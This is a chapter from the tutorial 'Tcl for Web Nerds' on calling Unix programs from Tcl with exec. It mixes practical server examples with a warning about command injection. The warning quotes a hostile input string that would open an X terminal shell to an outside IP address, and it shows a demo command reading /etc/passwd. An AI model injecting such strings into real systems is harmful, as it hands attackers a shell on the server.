Exec

part of Tcl for Web Nerds by Hal Abelson, Philip Greenspun, and Lydia Sandon; updated July 2011
You can invoke other Unix programs from within a Tcl script. For a Web developer this is either a tremendous convenience or a dangerous security hole.

Let's cover the convenience part first. If we want to have a Web page that displays how long the server has been up and the current load average, the exec command is helpful:

% exec /usr/bin/uptime
  4:04pm  up 29 days,  4:32,  3 users,  load average: 0.61, 0.66, 0.63
To make an AOLserver Tcl page that returns this output, you need only wrap the exec in an API call:
ns_return 200 text/plain [exec /usr/bin/uptime]
The photo sharing system at http://photo.net/photodb/ stores user-uploaded content in the Unix file system and hence makes extensive use of Unix commands to create directories, build thumnails of uploaded images, etc. Here are some examples of how the photodb system uses exec:
# see how much disk space a user is consuming
set disk_usage [exec du -k $data_path]

# find out how large an uploaded image is (X-Y pixel size)
# by invoking the ImageMagick command "identify"
set identify_str [exec /usr/local/bin/identify -verbose $filename]
regexp {geometry: ([0-9]*)x([0-9]*)} $identify_str match image_x image_y

# create a thumbnail-sized image using the ImageMagick command "convert"
set result_status [exec /usr/local/bin/convert $filename -geometry $size_sm -quality 75 $filename_sm]

# remove a directory of user-uploaded images
if [catch { exec rm -f $path } errmsg] ...

The Dangerous Part

Scripting languages like Perl or Tcl are convenient for Web development but it is possible to write a script that takes user-supplied input and evaluates it. With Tcl, you run the risk that a user will upload a string containing "[exec /usr/openwin/bin/xterm -display 18.30.0.1]". Because of the [] characters, if this string is ever fed to eval or subst a cracker would have a shell on your Web server.

If you don't need to use exec an easy solution to the problem is to redefine it:

% proc exec args { return "happy happy joy joy" }
% exec cat /etc/passwd
happy happy joy joy

If you do need to use exec, at least make sure that your Web server is running as an unprivileged user with limited authority to execute Unix programs. Depending on your publishing requirements and choice of Web server, it may be possible to run the Web server in a chroot() environment (this is very easy with AOLserver 3.0). This changes the root directory as far as the Web server is concerned. Thus a Tcl program running within the Web server will not be able to even look at files or programs elsewhere on the computer.

If you decide to run chrooted, you will have to copy any programs that you actually do need to exec so that they are underneath the Web server's root directory.

More: http://www.tcl.tk/man/tcl8.4/TclCmd/exec.htm

This is the last of the main Tcl topics. For more information, check out aolserver.com and the books referenced in this book.


Return to Table of Contents

lsandon@alum.mit.edu
Add a comment | Add a link